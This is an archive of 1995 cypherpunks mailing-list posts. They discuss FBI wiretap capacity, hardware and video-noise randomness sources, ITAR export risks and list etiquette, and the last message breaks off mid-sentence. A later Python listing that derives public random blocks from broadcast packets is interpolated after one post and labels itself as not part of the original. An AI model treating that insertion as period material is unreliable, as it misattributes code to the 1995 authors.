"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 17:32:54 +0800
To: clarkm@cnct.com
Subject: [NOISE, NOTE HEADERS] Re: FBI Wants to Wiretap One of Every 100 , Phones in Urban Areas
In-Reply-To: <9511031007.AA0024@localhost>
Message-ID: <Pine.ULT.3.91.951103001110.25597G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.com wrote:

> > On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:
> > 
> > > Thanks for this item!  Two little excerpts jump out at me.
> > 
> > Gee, I hope they didn't spook you too badly when they jumped out at you 
> > like that. I can tell you're a little jumpy.
> 
> Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

I can only hope you're joking, but based on your last article, I'm not so
sure. That was intended as a small joke for anyone using PGP; see the
X-PGP-Key header in the original message. 

You really should have talked to Steve Pizzo before bastardizing his
article. Now you might get written up again as an example of the
conspiracy wackos on the net. I suppose you view any publicity as a
positive. I wholly support that goal. 

> > By whom is the FBI being sued? What is the case number? Who are the 
> > lawyers? What are their Bar numbers? How many times have they been 
> > disciplined for bringing frivolous suits?
> 
> EPIC.

EPIC has indeed made an FOIA claim and sued the FBI, but not for the
reasons stated, which is why I assumed you were talking about something
else. Again, Spotlight being vague about evidence that doesn't really
support their points. The case is C.A. No. 94-1720 (CRR) in D.C.  You can
write to the court for the full record, at duplication cost. 

I fully support EPIC's position. My apologies for confusing the message
with the second-hand, third-rate messenger. 

I notice you added Arnie Lerma to the recipient list. Didn't he publicly 
dissociate himself from you guys? Doesn't he have other things on his 
mind? I have another little joke just for him on my machine at 
gopher://dorms.stanford.edu:70/0R478556-480696-/win95netbugs et seq (the 
file actually goes all the way to byte 1149418).

[Big Bird deleted]

- -rich
 [Followups out of cpunks, please]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnZhY3DXUbM57SdAQE0LgQArrZJMe0SUyScgQ/AVdJIfwNGIjpg7eqc
uIPQYs/1zx1edkL5hEhFaU3QnkJanRyxbNrx6sRLDv1veFqCFV8CHD9vmU1UFKMr
h9C+/B0wXB1JuhNmUK07I1ontVcCy6DDC12RR1Ar+yhFXbD6TsGY5ZF6S6KeDqjb
oV4R5rzFwaM=
=/3TK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sharborth@hai-net.com
Date: Fri, 3 Nov 1995 14:41:31 +0800
To: perry@piermont.com
Subject: Re: Radiation Detectors from Aware Electronics
Message-ID: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
MIME-Version: 1.0
Content-Type: text/plain


     So what does this have to do with this mailing list??
     
     Skip


______________________________ Reply Separator _________________________________
Subject: Radiation Detectors from Aware Electronics
Author:  perry@piermont.com at internet
Date:    02-11-95 23:45


There have been several requests for information on the company that 
makes the radiation detectors with RS232 interfaces that I mentioned.
     
Here is how to reach them:
     
Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800
     
     
Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 16:08:00 +0800
To: cypherpunks@toad.com
Subject: wiretaping ability and future plans
Message-ID: <01HX6STU0B649AO7EU@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 01:55:06 -0800
>From: Jay Campbell <edge@got.net>
>Subject: FBI seeks huge wiretapping system

>FBI seeks huge wiretapping system
>BY JOHN MARKOFF
>New York Times

>``These are staggering numbers,'' said Mark Rasch, director of
>information security law and policy for Science Applications
>International Corp. in McLean, Va. ``Either they do a lot more
>wiretaps than they now admit, or they plan on doing a significant
>larger number of wiretaps in the future because of the fear of
>domestic terrorism.''

I can see at least two possible alternative explanations:

1.   The FBI envisions a time when voice-recognition systems will be
cheap enough to do "keyword searches" on digital voice in something
close to real time, with high accuracy.  This might be useful when
fishing for crime, dissent, etc.  It would certainly require some
rather broader powers, but they may expect this, especially if they
expect more acts of domestic and foreign terrorism.

2.   After implementing some kind of widespread escrowed crypto, the
FBI envisions recording lots of encrypted phone conversations,
perhaps targeted on suspicious people, perhaps random.  Since the
whole conversation is encrypted, this might not violate any laws,
since they still have to get the warrant to recover the
conversation.  This would get them past the obvious practical
problem with most wiretap-based investigations--if you start your
wiretap three days after the target becomes a suspect, you've
probably missed all the juicy stuff.  Only a bit of carelessness or
stupidity on the part of your target will get the desired
information.

>   Jay Campbell                edge@got.net - Operations Manager
>   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
>   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJm0AUHx57Ag8goBAQGHTAP/XCsTUjb26sLB+UORMQCNjtBz2dhCjcF2
QkKfRjuUcBOG3z/nCeLDgfb1hWiiSYJwRhJOTG0dCcqS9k9gO//hpC4CsDz3y0Yw
mt5sG4X6POB+ljBfFOHqM7joekLmnmbodZQYdmiFTHbZ/Zn4w4obrTRjcPKhlQH9
Fctxd8JCYyg=
=ITxA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 4 Nov 1995 16:09:30 +0800
To: cypherpunks@toad.com
Subject: video as a source of public randomness
Message-ID: <01HX6SUGVCSI9AO7EU@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 02 Nov 1995 00:39:29 -0800
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: Video as a source of randomness

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

This seems like a potential source of a stream of public random
bits.  If these can be authenticated and matched, this kind of thing
can be useful in a lot of protocols.  For example, if there is some
packet structure in the digital video transmission which has at
least 160 bits of entropy, then we can take the SHA1(packet[i]) to be
public random bit block i.  (If we're worried about entropy, we can
collect arbitrarily large numbers of packets to hash per 160-bit
public random block.)

For large-scale, above ground protocols, these packets would need
some kind of signature or other authentication.  However, for
protocols that could handle having the public random string checked
offline later, this idea provides a reasonably good public random
string that can be used without any knowledge or consent of the
broadcaster/cable system/satellite system/whatever.  If the
transmission is sent under encryption, so much the better.  This
does still leave the possibility that an attacker could control the
broadcaster's transmissions for a few seconds, but this seems
unlikely in practice.

An alternative might be the encrypted transmissions from any
communications satellite.  How many telephone calls are your
opponents able to reroute?

>--Tim May, who has both audio and video digitizers built into his Power
>Macintosh 7100av, but notes that none of the crypto programs he uses has
>any provision for using them, and so he doesn't use them for crypto
>purposes.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmz3kHx57Ag8goBAQGYiwQAkx3dxUUcGjsEKqRAlc0CTq6EaTzBrLRz
ifrKgZPxfyD9F+sBTJGGPpHWc3mtfwJwV8HeIa/MY1Z1hpssN1ZY6ELlEn+4FFIA
3A+BNjB1PKrHebVZ0WHBJ3DI3h4/olF37bYNP261Uqd8CNig+fQ3VMtE0L0frBdr
I+izpEMOwiw=
=y7To
-----END PGP SIGNATURE-----
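The SHA1(packet[i]) construction from the message above, with several packets hashed per 160-bit block and an offline check by a second party who recorded the same transmission. This is an added example, not code from the original post; the block index bound into the hash, the length-prefixed framing, and the sample packets (constructed here, with no real entropy) are assumptions.

```python
import hashlib
import hmac
import struct

# Constructed stand-ins for recorded broadcast packets. A real recording
# would carry the channel's own unpredictability; these only drive the demo.
SAMPLE_PACKETS = [f"constructed packet {i}".encode() for i in range(14)]


def derive_block(index, packets):
    """Hash one group of recorded packets into public random block `index`.

    SHA-1 is used because it is the hash named in the post.
    Assumptions added here: the block index is hashed in so a block cannot be
    replayed at another position, and each packet is length-prefixed so that
    different packet boundaries never produce the same hash input.
    """
    h = hashlib.sha1()
    h.update(struct.pack(">Q", index))
    for p in packets:
        h.update(struct.pack(">I", len(p)))
        h.update(p)
    return h.digest()  # 20 bytes = 160 bits


def public_random_blocks(packets, packets_per_block=1):
    """Turn a recorded packet sequence into a list of 160-bit blocks.

    Raising packets_per_block is the post's remedy when a single packet may
    hold fewer than 160 bits of entropy. A trailing partial group is dropped
    rather than hashed, so every block covers the same number of packets.
    """
    if packets_per_block < 1:
        raise ValueError("packets_per_block must be at least 1")
    usable = len(packets) - len(packets) % packets_per_block
    blocks = []
    for start in range(0, usable, packets_per_block):
        group = packets[start:start + packets_per_block]
        blocks.append(derive_block(start // packets_per_block, group))
    return blocks


def verify_block(index, claimed, recorded_packets, packets_per_block=1):
    """Offline check: recompute block `index` from our own recording.

    Returns False when our recording does not cover the whole group, or when
    the recomputed block differs from the claimed one.
    """
    start = index * packets_per_block
    group = recorded_packets[start:start + packets_per_block]
    if len(group) != packets_per_block:
        return False
    return hmac.compare_digest(derive_block(index, group), claimed)


def demo():
    """Two observers of the same stream agree; an altered packet is caught."""
    alice = public_random_blocks(SAMPLE_PACKETS, packets_per_block=4)
    bob = public_random_blocks(list(SAMPLE_PACKETS), packets_per_block=4)

    # One packet altered in transit (the "attacker controls the broadcast
    # for a few seconds" case): only the block covering it changes.
    tampered = list(SAMPLE_PACKETS)
    tampered[5] = b"substituted packet"
    mallory = public_random_blocks(tampered, packets_per_block=4)

    return {
        "observers_agree": alice == bob,
        "changed_blocks": [i for i, (a, m) in enumerate(zip(alice, mallory)) if a != m],
        "honest_verifies": verify_block(1, alice[1], SAMPLE_PACKETS, 4),
        "tampered_verifies": verify_block(1, alice[1], tampered, 4),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The check only shows that two recordings match; it says nothing about how much entropy the packets actually held, which still has to be argued from the source.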




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee <gate@id.wing.net>
Date: Sat, 4 Nov 1995 21:20:47 +0800
To: cypherpunks@toad.com
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030241.VAA26248@minerva.cis.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


FBI Wants to Wiretap One of Every 100 Phones in
Urban Areas


By MATT YANCEY

Associated Press Writer

WASHINGTON (AP) - The FBI wants the capability to simultaneously tap one 
of
every 100 phone and data transmission lines in major urban centers, but a 
top
Justice Department official said there are no plans to expand the existing 
number
of wiretaps.

As part of its effort to deal with a new breed of computer-savvy
criminals adept at using new telecommunications technologies, the FBI
said it wants phone companies to initially set aside 0.5 percent, or one
of every 200 lines, for law enforcement use in high-crime urban areas.
But it added it also wants the ability to rapidly expand that capability
to one of every 100 lines if the need arises. The disclosure was made in
a little-noticed announcement in the Federal Register.

Despite the notice, Deputy Attorney General Jamie Gorelick said today,
"There is no intention to expand the number of wiretaps or the extent of
wiretapping ... I don't think the American people should be worried
about that."

Last year, federal and state courts authorized 1,154 wiretaps, of which
48 percent were sought by federal agents. Increases in recent years have
mostly come in drug trafficking cases. Gorelick acknowledged: "As we've
gotten more aggressive in the drug war, as organized gang activity has
been an increased focus for us, we've seen a slight increase."

The FBI proposal, unveiled on three pages of the thick daily compendium
of federal regulations and other government activities for Oct. 16, had
been long anticipated since the passage last year of the Communications
Assistance for Law Enforcement Act.

"The entire purpose of the digital telephony legislation was to leave
law enforcement in the same position it is now with respect to wiretaps:
That is, to ensure that emerging digital technology would not defeat
current lawful wiretaps," Gorelick said, noting that court approval
would still be required for any wiretap. "There appears to be some
misunderstanding or miscommunication as to the implications of what is
contained in that notice."

But experts familiar with the law did not expect the FBI's reach into
the world of new fiber optic cables, digital switches and high-speed
modems for transmitting business transactions as well as voices to be so
sweeping.

"The level of capacity that the FBI is proposing here would come as a
surprise to many who supported the legislation," said James X. Dempsey,
deputy director of the Center for National Security Studies, a group
that monitors government surveillance activities.

While the federal notice does not specify which cities would be
targeted, Dempsey said New York is likely to be one of them. Assuming
there are 2 million separate phone and data transmission lines there,
that means the FBI wants the ability to tap 20,000 of them
simultaneously, he said.

"People are starting to say that seems awfully high," Dempsey said,
noting that the overall level of such surveillance activity is now a
total of 20,000 to 25,000 intercepts nationwide over an entire year.

The FBI said in its official notice that its capability needs were based
on "an historical baseline of electronic surveillance activity" after
surveying federal, state and local courts, prosecutors and police
agencies.

It did not offer a further explanation, but during hearings over the
past four years leading to passage of the 1994 law, FBI and other
officials cited the growing incidence of computer-based crimes.

The law was intended to remove what law enforcement officials have
considered a major impediment - the growing obsolescence of the copper
phone wire - in probing drug trafficking, organized crime, terrorism,
kidnaping and sophisticated new types of white-collar crime.

"Without this bill ... we would have been completely prevented in a very
short time from carrying out any court-approved wiretapping," FBI
Director Louis Freeh said at the time.

While law enforcement officers will still have to get court approval for
any wiretaps they install, the technological measures authorized by the
law would remove the objections of some judges.

Copper telephone lines were relatively easy to tap because they carried
only one conversation. But digital switches and fiber optics now in
growing use often carry hundreds of conversations or data transmissions
at the same time, making it difficult to isolate a single phone line.

The law authorized $500 million for the government to pay the phone
companies their cost in installing the necessary technology, but none of
the money has been appropriated.

And with increased criticism focused on the FBI for its role in the 1993
Branch Davidian siege in Waco, Texas, and the 1992 deadly standoff
against white separatist Randy Weaver in Ruby Ridge, Idaho, there is no
assurance Congress will be forthcoming with the money.

Legislation sent by President Clinton to Congress seeking greater
wiretap authority in the wake of the April bombing of the federal
building in Oklahoma City is languishing in congressional committees and
is given little prospect of being passed this year.



http://www.trib.com/NEWS/HEAD/FBI.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 3 Nov 1995 15:37:43 +0800
To: czeps@icis.on.ca
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511031007.AA0024@localhost>
MIME-Version: 1.0
Content-Type: text/plain


> On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:
> 
> > Thanks for this item!  Two little excerpts jump out at me.
> 
> Gee, I hope they didn't spook you too badly when they jumped out at you 
> like that. I can tell you're a little jumpy.

Hi Rich!  Thx for changing my domain, I'm sure it fooled SAIC.

> > So what is it?  1,154 wiretaps?  Or 20,000?
> 
> Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
> wiretaps and other interceptions, i.e., recording which phone numbers you 
> call but not actually listening to the conversations.
> 
> Get out of Dodge.

You get out of Dodge.

1,154 electronic surveillance orders, about 7,000 pen registers & trap/trace
plus 500 FISA warrants, all 1993 if memory serves.

Figures as supplied to EPIC, and from memory.

> By whom is the FBI being sued? What is the case number? Who are the 
> lawyers? What are their Bar numbers? How many times have they been 
> disciplined for bringing frivolous suits?

EPIC.

Quick!!  Fire up your index!

> > What's so special about the year 2002?  
> 
> Obviously, it is two elections from now, when the UN will invade the US 
> to impose the rule of the Anti-Christ.
> 
> Oops, I wasn't supposed to say that.

But now that you have...

Check out the wiretap stats and FOIA responses at http://www.epic.org and 
come back & quibble some more.
     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 3 Nov 1995 17:04:59 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030134.BAA04330@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


This story broke on ABC radio news 26 hours ago.
It is still running as lead story.

Love Always,

Carol Anne...still amazed it's lead story
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 18:53:21 +0800
To: cypherpunks@toad.com
Subject: Re: alt.anonymous.messages considered harmful
Message-ID: <199511031132.DAA08776@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>Those who do get the message, can not notice a cancel attack; those
>who don't, would have to carefully search for suspicious Supersedes:
>lines and monitor the control newsgroup. A denial of service attack by
>manipulated Path: header cannot be detected by the victim.

cancels aren't the only monster .. we have a vigilante up the pipe somewhere
deleting a chunk of every post set in certain alt.binaries.* groups without
a cancel - they're simply not passing along a piece of every set. this is
irritating (as an ISP) since it should be an individual site's
responsibility (if not the user emselve's), hence the term 'vigilante' as
opposed to 'concerned administrator'. the fix is to get multiple feeds, of
course, but everyone in the area happens to be fed through this branch ..
but i digress. 
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 3 Nov 1995 23:13:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: What!!!
In-Reply-To: <acbef6c303021004c367@[205.199.118.202]>
Message-ID: <Pine.3.89.9511030329.B15438-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 2 Nov 1995, Timothy C. May wrote:

> At 11:25 PM 11/2/95, tony266@vabeach.email.net wrote:
> 
> >Can someone tell me this cypherpunks is all about???
> 
> Grammar not best subject his. List sense make after read for time.
Quibble quibble. He's referring to cypherpunks the list in the singular, not
us the masses in the plural.
> 
> --Klaus!
> 
> More seriously, when you subscribed you undoubtedly got a "Welcome"
> message. I suggest you read it.
> 
Mayhap he's another person whose lists are gradually being fused into cpunks
due to mass forwarding :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 18:48:43 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <199511031144.DAA08978@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>	Is it?  This is the _one_ thing in the article (is that term
>giving it too much legitimacy?) that I thought was barely true.  Whoever
>controls the root level DNS servers effectively controls the Internet.
>I postulated a couple of months ago about how the US Govt might attempt
>to censor the rest of the world: "Remove lurid.porno.site.other-country
>from your DNS system within 72 hours or we will remove references to
>your DNS servers from the root level servers.".  (I also speculated that
>if the US Govt tried doing this, that an 'underground' DNS system would
>form almost immediately.)

[off topic]

It almost did when InterNIC announced its recent (and abrupt) new pricing
structure for domain names. All it would take is an additional entry in
{dns}/root.cache - even a small company with decent VC (and multiple
geographic locations, preferably) could have pulled this off and made a
decent chunk of change underselling InterNIC; with a slight shift in the way
things are done, the model could have been opened up into a competitive
market with price and (GASP!) customer service/response time wars. [FADE IN:
Look, Jim! I submitted my domain through Campbell.NET 30 seconds ago and
it's already live .. That's nothing, Terry, ...]

Yet another 'axiom' that turns out to be nothing more than convention.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 3 Nov 1995 18:06:04 +0800
To: cypherpunks@toad.com
Subject: censored with Perry
Message-ID: <199511031355.HAA16831@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli writes:

>In any case, before Perry (rightly) send us stern reminders of the scarce
>crypto relevance of this thread, let's take it out of Cypherpunks and,
>if someone is interested, let's continue by e-mail.

   Perry is again narrowly defining allowable speech on Cypherpunks.
Encryption becomes a trivial topic if its best medium is taken by the
States. Perry is still in his "only encryption algorithms in C is a
proper topic for Cypherpunks" mode. This is a direction that if followed
would take the vitality and relevance out of the Cypherpunks list. Perry
does a disservice for Cypherpunks.

   Since when did Cypherpunks become the mailing list fit for Perry? Perry
makes a big deal out of "nobody speaks for Perry" yet on Cypherpunks he
has decided that he sets the parameters for allowed speech. When did Perry
come to own the list? Where did he get this "authority" to tell other
Cypherpunks to shut up? As Perry often presumptuously and rudely reminds
C'punks that their speech is not tolerable, we must also take the time
and trouble to occasionally tell Perry to shove his opinions up his ass.

                                                         Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Fri, 3 Nov 1995 19:09:06 +0800
To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511031202.EAA09281@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>I was being facetious. The point is that the government has no
>inherent right to tap our phones -- indeed, it didn't do so for nearly
>the first 200 years of our existence, and we did just fine -- better,
>in fact. 

It is a well-known fact that it was common practice for NSA operatives to
masquerade as Injuns in the 1800's and waylay Pony Express riders in order
to intercept communications between targeted parties. This practice lost
popularity towards the end of the century with the advent of boxed cereal,
and with it the Lone Ranger Decoder Ring, since the operatives were too
underfunded to afford anything more than oatmeal.

[ducks]
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:34:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031009.FAA11845@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:

Skip writes:
> So what does this have to do with this mailing list??

Perry recently recommended the use of background-radiation detectors as 
good cheap true RNGs. Properly deployed cryptography generally depends upon
excellent PRNGs, or preferably hardware RNGs.

Perhaps you overlooked that rather lengthy thread, Skip ?

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 18:58:16 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: censored with Perry
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <199511031020.FAA24928@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli writes:
> In any case, before Perry (rightly) send us stern reminders of the scarce
> crypto relevance of this thread, let's take it out of Cypherpunks 

Gary Jeffers writes:
>    Perry is again narrowly defining allowable speech on Cypherpunks.

Since Perry hasn't said a damn thing about this Hong Kong ISP thread on the 
list, I suggest that you're wasting your time chasing around a hypothetical
situation.  

-Futplex <futplex@pseudonym.com>	Me speak for Perry ?
        "It just couldn't be, and only a fool would say that" -Steely Dan, 1972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 3 Nov 1995 21:58:50 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Risks of ``foreign persons'' under the ITAR
Message-ID: <m0tBMJy-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


It is usually assumed that a foreign person outside the United States
runs no risks if he posts cryptographic software to the net or
otherwise discloses it to other foreign persons, although technically
that is a violation of the United States International Traffic in Arms
Regulations.

I note, however, that in an article entitled ``Export Controls on
Encryption Software'' by Ira S. Rubinstein, dated October 17, 1994 
(which apparently was distributed at some legal conference) the
following passage appears in Section 4(3):

                     ----------------

Finally, foreign employees of those companies or any foreign person
who runs afoul of export controls on technology transfers may face
severe immigration consequences.[83]  Under the Immigration and
Nationality Act,[84] as revised by the immigration act of 1990,[85] an
alien who seeks entry to the U.S. to engage in activities that violate
or evade export control laws is excludable.[86]  Similarly, an alien
who has engaged, is engaged, or at any time after entry engages in
such activities is deportable.[87]

                           [Notes]

[83] For a detailed discussion see generally Rubinstein, ``Export
Controls and Immigration Law,'' 93-3 Immigration Briefings (Mar.
1993). 

[84] Immigration and Nationality Act of 1952, Pub. L. No. 82-414, 66
Stat. 163 (codified as amended at 8 USC \S\S 1101-1524) (hereinafter
INA).

[85] Immigration Act of 1990, Pub. L. No. 101-649, 104 Stat. 4978
(hereinafter IMMACT 90).

[86] INA \S 212(a)(3)(A)(i)(II), 8 USC \S 1182(a)(3)(A)(i)(II).

[87] OMA \S 21(a)(4)(A)(i), \S 1251(a)(4)(A)(i).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 3 Nov 1995 22:36:37 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: video as a source of public randomness
In-Reply-To: <acbf02ca0402100496c4@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.951103090838.4011B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


	Would not generating random numbers using video sources be
susceptible to the same 'external' influences as generating random numbers
from radio static? External RF fields could skew the 'randomness' of the
data. 
	As another thought, has anyone done any work on RNGs involving
chaotic processes such as fluid dynamics and turbulent flow? I suspect
that pressure, or other parameter variances, in turbulent flow could yield
good random numbers. As a bonus, these parameters are easily measurable 
without special, exotic, equipment and should be inexpensive.

Regards, Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 22:36:37 +0800
To: sharborth@hai-net.com
Subject: Re: Radiation Detectors from Aware Electronics
In-Reply-To: <9510038153.AA815390510@houston_cc_smtp.hai-net.com>
Message-ID: <199511031419.JAA08735@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sharborth@hai-net.com writes:
>      So what does this have to do with this mailing list??

Generating good random numbers is key to operating a solid
cryptographic system. I've argued that computer interfaced radiation
detectors are the optimal way of generating such numbers because they
are hard to screw up -- biased diode noise and other sources are too
easy to misdesign or misuse. Aware is a source of such detectors.

Perry

> There have been several requests for information on the company that 
> makes the radiation detectors with RS232 interfaces that I mentioned.
>      
> Here is how to reach them:
>      
> Aware Electronics
> P.O. Box 4299
> Wilmington, DE 19807
> Phone (800) 729-5397
>       (302) 655-3800
>      
>      
> Perry
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 22:50:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Sources of randomness
In-Reply-To: <acbf085205021004e36c@[205.199.118.202]>
Message-ID: <199511031427.JAA08758@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
> rabbit ears, or nothing (since the idea is to get noise, from the ether, or
> from the tuner itself). A snow-filled picture has pixels which are unlikely
> in the extreme to be predicted/deduced by outside attackers, who cannot
> know the details of antenna orientation, microscopic variations in
> geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
> guessable.

I'm not so sure. There may be hidden patterns we don't notice. It's on
little things like this that a cryptanalyst would try to pry open a
hole in a system. I'm unwilling to predict that the patterns are
unguessable based purely on gut instinct. As Bob Morris of the NSA has
